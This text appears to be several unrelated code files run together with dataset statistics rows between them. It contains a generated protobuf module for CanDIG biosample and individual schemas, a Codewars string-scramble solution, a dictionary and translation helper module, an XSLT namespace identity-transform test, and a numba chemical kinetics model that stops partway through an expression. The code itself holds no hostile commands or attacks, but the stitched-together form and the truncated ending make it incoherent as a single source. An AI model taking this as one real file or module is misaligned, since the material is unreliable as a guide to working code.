\x01(\t\x12\x32\n*tumor_board_presentation_date_and_analyses\x18\x12 \x01(\t\x12\x10\n\x08\x63omments\x18\x13 \x01(\t\"\xe3\x03\n\tBiosample\x12\n\n\x02id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x34\n\x07\x64isease\x18\x05 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x0f\n\x07\x63reated\x18\x06 \x01(\t\x12\x0f\n\x07updated\x18\x07 \x01(\t\x12\x15\n\rindividual_id\x18\x08 \x01(\t\x12\x35\n\nattributes\x18\n \x01(\x0b\x32!.candig.schemas.candig.Attributes\x12@\n\x1cindividual_age_at_collection\x18\x0b \x01(\x0b\x32\x1a.candig.schemas.candig.Age\x12\x1f\n\x17\x65stimated_tumor_content\x18\x0c \x01(\t\x12\x1c\n\x14normal_sample_source\x18\r \x01(\t\x12\x13\n\x0b\x62iopsy_data\x18\x0e \x01(\t\x12$\n\x1ctumor_biopsy_anatomical_site\x18\x0f \x01(\t\x12\x13\n\x0b\x62iopsy_type\x18\x10 \x01(\t\x12\x1c\n\x14sample_shipment_date\x18\x11 \x01(\t\"J\n\x03\x41ge\x12\x0b\n\x03\x61ge\x18\x01 \x01(\t\x12\x36\n\tage_class\x18\x02 \x01(\x0b\x32#.candig.schemas.candig.OntologyTermb\x06proto3')
,
dependencies=[candig_dot_schemas_dot_candig_dot_common__pb2.DESCRIPTOR,])
_INDIVIDUAL = _descriptor.Descriptor(
name='Individual',
full_name='candig.schemas.candig.Individual',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='candig.schemas.candig.Individual.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dataset_id', full_name='candig.schemas.candig.Individual.dataset_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='candig.schemas.candig.Individual.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='candig.schemas.candig.Individual.description', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='created', full_name='candig.schemas.candig.Individual.created', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='updated', full_name='candig.schemas.candig.Individual.updated', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='species', full_name='candig.schemas.candig.Individual.species', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sex', full_name='candig.schemas.candig.Individual.sex', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='candig.schemas.candig.Individual.attributes', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='patient_id', full_name='candig.schemas.candig.Individual.patient_id', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='regional_profiling_centre', full_name='candig.schemas.candig.Individual.regional_profiling_centre', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='diagnosis', full_name='candig.schemas.candig.Individual.diagnosis', index=11,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pathology_type', full_name='candig.schemas.candig.Individual.pathology_type', index=12,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enrollment_approval_date', full_name='candig.schemas.candig.Individual.enrollment_approval_date', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enrollment_approval_initials', full_name='candig.schemas.candig.Individual.enrollment_approval_initials', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='date_of_upload_to_sFTP', full_name='candig.schemas.candig.Individual.date_of_upload_to_sFTP', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tumor_board_presentation_date_and_analyses', full_name='candig.schemas.candig.Individual.tumor_board_presentation_date_and_analyses', index=16,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comments', full_name='candig.schemas.candig.Individual.comments', index=17,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=685,
)
_BIOSAMPLE = _descriptor.Descriptor(
name='Biosample',
full_name='candig.schemas.candig.Biosample',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='candig.schemas.candig.Biosample.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dataset_id', full_name='candig.schemas.candig.Biosample.dataset_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='candig.schemas.candig.Biosample.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='candig.schemas.candig.Biosample.description', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='disease', full_name='candig.schemas.candig.Biosample.disease', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='created', full_name='candig.schemas.candig.Biosample.created', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='updated', full_name='candig.schemas.candig.Biosample.updated', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='individual_id', full_name='candig.schemas.candig.Biosample.individual_id', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='candig.schemas.candig.Biosample.attributes', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='individual_age_at_collection', full_name='candig.schemas.candig.Biosample.individual_age_at_collection', index=9,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='estimated_tumor_content', full_name='candig.schemas.candig.Biosample.estimated_tumor_content', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normal_sample_source', full_name='candig.schemas.candig.Biosample.normal_sample_source', index=11,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='biopsy_data', full_name='candig.schemas.candig.Biosample.biopsy_data', index=12,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tumor_biopsy_anatomical_site', full_name='candig.schemas.candig.Biosample.tumor_biopsy_anatomical_site', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='biopsy_type', full_name='candig.schemas.candig.Biosample.biopsy_type', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sample_shipment_date', full_name='candig.schemas.candig.Biosample.sample_shipment_date', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=688,
serialized_end=1171,
)
_AGE = _descriptor.Descriptor(
name='Age',
full_name='candig.schemas.candig.Age',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='age', full_name='candig.schemas.candig.Age.age', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='age_class', full_name='candig.schemas.candig.Age.age_class', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1173,
serialized_end=1247,
)
_INDIVIDUAL.fields_by_name['species'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_INDIVIDUAL.fields_by_name['sex'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_INDIVIDUAL.fields_by_name['attributes'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ATTRIBUTES
_INDIVIDUAL.fields_by_name['diagnosis'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_BIOSAMPLE.fields_by_name['disease'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_BIOSAMPLE.fields_by_name['attributes'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ATTRIBUTES
_BIOSAMPLE.fields_by_name['individual_age_at_collection'].message_type = _AGE
_AGE.fields_by_name['age_class'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
DESCRIPTOR.message_types_by_name['Individual'] = _INDIVIDUAL
DESCRIPTOR.message_types_by_name['Biosample'] = _BIOSAMPLE
DESCRIPTOR.message_types_by_name['Age'] = _AGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Individual = _reflection.GeneratedProtocolMessageType('Individual', (_message.Message,), dict(
DESCRIPTOR = _INDIVIDUAL,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Individual)
))
_sym_db.RegisterMessage(Individual)
Biosample = _reflection.GeneratedProtocolMessageType('Biosample', (_message.Message,), dict(
DESCRIPTOR = _BIOSAMPLE,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Biosample)
))
_sym_db.RegisterMessage(Biosample)
Age = _reflection.GeneratedProtocolMessageType('Age', (_message.Message,), dict(
DESCRIPTOR = _AGE,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Age)
))
_sym_db.RegisterMessage(Age)
# @@protoc_insertion_point(module_scope)
| 50.043702
| 2,088
| 0.739611
| 2,702
| 19,467
| 5.048853
| 0.084012
| 0.065093
| 0.082173
| 0.067439
| 0.829497
| 0.792699
| 0.721962
| 0.693887
| 0.668304
| 0.661413
| 0
| 0.043611
| 0.126008
| 19,467
| 388
| 2,089
| 50.17268
| 0.758199
| 0.019674
| 0
| 0.714681
| 1
| 0.00277
| 0.24848
| 0.217761
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019391
| 0
| 0.019391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a419eed2463ef41dec0206b23b310ccd8621ee74
| 106
|
py
|
Python
|
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
from collections import Counter
def scramble(s1, s2):
return Counter(s1) & Counter(s2) == Counter(s2)
| 26.5
| 51
| 0.716981
| 15
| 106
| 5.066667
| 0.6
| 0.236842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05618
| 0.160377
| 106
| 4
| 51
| 26.5
| 0.797753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8ef7c2dbf0a0988a526a08c8ed777e5274a7bb35
| 3,443
|
py
|
Python
|
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | 1
|
2022-02-23T01:24:46.000Z
|
2022-02-23T01:24:46.000Z
|
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | null | null | null |
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | null | null | null |
from phdictionary.requestor import Requester
from phdictionary.file_manager import FileManager
# Definition block
# {
def get_definition(word, number_of_examples=0, grammar_mark=False):
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_definition_1(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_definition_1(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_definition_1(word, number_of_examples, grammar_mark)[1:]
return r.get_definition_1(word, number_of_examples, grammar_mark)
# }
# Translation block
# {
def get_french_english(word, number_of_examples=0, grammar_mark=False):
try:
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[1:]
return r.get_french_english_q(word, number_of_examples, grammar_mark)
except:
print('Try again, something went wrong. It might be spelling')
def get_english_french(word, number_of_examples=0, grammar_mark=False):
try:
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[1:]
return r.get_eng_fr(word, number_of_examples, grammar_mark)
except:
print('Try again, something went wrong. It might be spelling')
def get_french_russian(word, number_of_examples=0, ):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'fr-ru')
def get_russian_french(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'ru-fr')
def get_russian_english(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'ru-en')
def get_english_russian(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'en-ru')
# }
# Synonym block
# {
def get_synonym(word, number_of_syn=1):
try:
r = Requester()
return r.get_synonym(word, number_of_syn)
except:
print('Try again, something went wrong. It might be spelling')
# }
# Files block
# {
def get_french_english_from_file(file, number_of_examples=0):
f = FileManager()
return f.txt_french_english(file, number_of_examples)
def get_synonyms_from_file(file, number_of_syn=1):
f = FileManager()
return f.syn_txt(file, number_of_syn)
def get_definition_from_file(file, number_of_examples=0):
f = FileManager()
return f.definition(file, number_of_examples)
def get_english_french_from_file(file, number_of_examples=0):
f = FileManager()
return f.txt_english_french(file, number_of_examples)
# }
| 33.105769
| 86
| 0.715655
| 510
| 3,443
| 4.488235
| 0.107843
| 0.146789
| 0.265618
| 0.200961
| 0.846658
| 0.812582
| 0.756662
| 0.756662
| 0.740498
| 0.740498
| 0
| 0.013228
| 0.187627
| 3,443
| 103
| 87
| 33.427184
| 0.805148
| 0.022074
| 0
| 0.461538
| 0
| 0
| 0.053369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184615
| false
| 0
| 0.030769
| 0
| 0.538462
| 0.046154
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
f13111eb9db9f989894947631975f7c0478f9a50
| 4,383
|
py
|
Python
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | 1
|
2020-07-26T03:57:45.000Z
|
2020-07-26T03:57:45.000Z
|
#Dave's Pawson's identity transform problem
from Xml.Xslt import test_harness
source_1="""<elem xmlns="http:default.com" xmlns:foo="http://foo.com">
<foo:child/>
</elem>"""
sheet_1="""<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0"
>
<!-- identity transforms. -->
<xsl:template match="*">
<xsl:element name="{name(.)}" namespace="http://www.w3.org/1999/xhtml">
<xsl:apply-templates select="@*" />
<xsl:apply-templates />
</xsl:element>
</xsl:template>
<xsl:template match="@*">
<xsl:copy-of select="." />
</xsl:template>
</xsl:stylesheet>"""
sheet_2="""<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:foo="http://foo.com"
version="1.0"
>
<!-- identity transforms. -->
<xsl:template match="*">
<xsl:element name="{name(.)}" xmlns="http://www.w3.org/1999/xhtml">
<xsl:apply-templates select="@*" />
<xsl:apply-templates />
</xsl:element>
</xsl:template>
<xsl:template match="@*">
<xsl:copy-of select="." />
</xsl:template>
</xsl:stylesheet>"""
source_2="""<html>
<head>
<title>The TCS Review 2000/2001 - Working Together</title>
<meta name="NCC:Format" content="Daisy 2.0"/>
<meta name="NCC:Publisher" content="RNIB"/>
<meta name="NCC:Identifier" content="UK:RNIB:6DCA50D0-E4E2-4472-A2DA-"/>
<meta name="NCC:Charset" content="ISO-8859-1"/>
<meta name="dc:title" content="The TCS Review 2000/2001 - Working Together"/>
<meta name="dc:format" content="Daisy 2.0"/>
<meta name="dc:creator" content="David Gordon - RNIB"/>
<meta name="dc:subject" content="Factual"/>
<meta name="ncc:narrator" content="mixed voices"/>
<meta name="ncc:generator" content="LpStudioGen 1.5"/>
<meta name="ncc:tocitems" content="70"/>
<meta name="ncc:page-front" content="0"/>
<meta name="ncc:page-normal" content="0"/>
<meta name="ncc:page-special" content="0"/>
<meta name="ncc:totaltime" content="01:23:19"/>
</head>
</html>"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<elem xmlns='http://www.w3.org/1999/xhtml'>
<foo:child xmlns:foo='http://www.w3.org/1999/xhtml'/>
</elem>"""
expected_2 = """<?xml version='1.0' encoding='UTF-8'?>
<elem xmlns='http://www.w3.org/1999/xhtml'>
<foo:child xmlns:foo='http://foo.com'/>
</elem>"""
expected_3="""<?xml version='1.0' encoding='UTF-8'?>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>The TCS Review 2000/2001 - Working Together</title>
<meta name='NCC:Format' content='Daisy 2.0'/>
<meta name='NCC:Publisher' content='RNIB'/>
<meta name='NCC:Identifier' content='UK:RNIB:6DCA50D0-E4E2-4472-A2DA-'/>
<meta name='NCC:Charset' content='ISO-8859-1'/>
<meta name='dc:title' content='The TCS Review 2000/2001 - Working Together'/>
<meta name='dc:format' content='Daisy 2.0'/>
<meta name='dc:creator' content='David Gordon - RNIB'/>
<meta name='dc:subject' content='Factual'/>
<meta name='ncc:narrator' content='mixed voices'/>
<meta name='ncc:generator' content='LpStudioGen 1.5'/>
<meta name='ncc:tocitems' content='70'/>
<meta name='ncc:page-front' content='0'/>
<meta name='ncc:page-normal' content='0'/>
<meta name='ncc:page-special' content='0'/>
<meta name='ncc:totaltime' content='01:23:19'/>
</head>
</html>"""
def Test(tester):
tester.startGroup("element with namespace attr")
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_1,
title='test 1')
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_2)
test_harness.XsltTest(tester, source, [sheet], expected_2,
title='test 2')
source = test_harness.FileInfo(string=source_2)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_3,
title='test 3')
source = test_harness.FileInfo(string=source_2)
sheet = test_harness.FileInfo(string=sheet_2)
test_harness.XsltTest(tester, source, [sheet], expected_3,
title='test 4')
tester.groupDone()
return
| 35.346774
| 85
| 0.623089
| 584
| 4,383
| 4.621575
| 0.183219
| 0.088922
| 0.089663
| 0.035569
| 0.89811
| 0.882549
| 0.87625
| 0.855873
| 0.855873
| 0.855873
| 0
| 0.048414
| 0.180014
| 4,383
| 123
| 86
| 35.634146
| 0.70256
| 0.009582
| 0
| 0.451923
| 0
| 0.038462
| 0.757373
| 0.076037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009615
| false
| 0
| 0.009615
| 0
| 0.028846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f13c00105c3d83e9b1a116a4b3489e676f16c368
| 8,786
|
py
|
Python
|
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | 2
|
2022-02-23T12:03:32.000Z
|
2022-02-23T14:27:29.000Z
|
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import numba
@numba.jit(numba.float64[:](numba.float64,numba.float64[:],numba.float64[:]),
locals={'P': numba.float64[:],'F': numba.float64[:,:],'I':numba.float64[:]},nopython=True)
def model_function(time, S, k):
P = np.zeros(len(S))
F = np.array(
[[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.008333333]])
idx = np.abs(F[0] - time).argmin()
I = F[1:-1,idx]
sigma_flow = F[-1,idx]
P[0] = -k[0]*S[0]*S[1]-k[16]*S[0]*S[2]
P[1] = +k[0]*S[0]*S[1]+k[4]*S[8]*S[1]+k[9]*S[6]*S[1]+k[13]*S[8]*S[1]+k[20]*S[13]*S[1]+k[22]*S[25]*S[1]+k[25]*S[25]*S[1]+k[27]*S[4]*S[1]+k[28]*S[12]*S[1]+k[32]*S[11]*S[1]+k[36]*S[7]*S[1]+k[38]*S[11]*S[1]+k[43]*S[33]*S[1]+k[50]*S[19]*S[1]+k[54]*S[27]*S[1]-k[0]*S[0]*S[1]-k[4]*S[8]*S[1]-k[9]*S[6]*S[1]-k[13]*S[8]*S[1]-k[18]*S[10]*S[22]*S[1]-k[20]*S[13]*S[1]-k[22]*S[25]*S[1]-k[25]*S[25]*S[1]-k[27]*S[4]*S[1]-k[28]*S[12]*S[1]-k[32]*S[11]*S[1]-k[36]*S[7]*S[1]-k[38]*S[11]*S[1]-k[43]*S[33]*S[1]-k[50]*S[19]*S[1]-k[54]*S[27]*S[1]-k[55]*S[10]*S[12]*S[1]
P[2] = +k[0]*S[0]*S[1]+k[6]*S[8]+k[27]*S[4]*S[1]+k[43]*S[33]*S[1]+k[47]*S[17]+k[49]*S[16]+k[52]*S[20]+k[53]*S[25]-k[1]*S[2]*S[3]-k[3]*S[7]*S[2]-k[8]*S[2]*S[10]-k[11]*S[4]*S[2]-k[12]*S[7]*S[2]-k[15]*S[4]*S[2]-k[16]*S[0]*S[2]-k[19]*S[4]*S[2]-k[56]*S[2]*S[10]
P[3] = +k[1]*S[2]+k[14]*S[18]+k[23]*S[28]+k[26]*S[30]+k[31]*S[26]+k[33]*S[32]+k[39]*S[30]+k[40]*S[18]+k[44]*S[26]+k[51]*S[18]-k[1]*S[2]*S[3]-k[14]*S[18]*S[3]-k[23]*S[28]*S[3]-k[26]*S[30]*S[3]-k[31]*S[26]*S[3]-k[33]*S[32]*S[3]-k[39]*S[30]*S[3]-k[40]*S[18]*S[3]-k[44]*S[26]*S[3]-k[51]*S[18]*S[3]
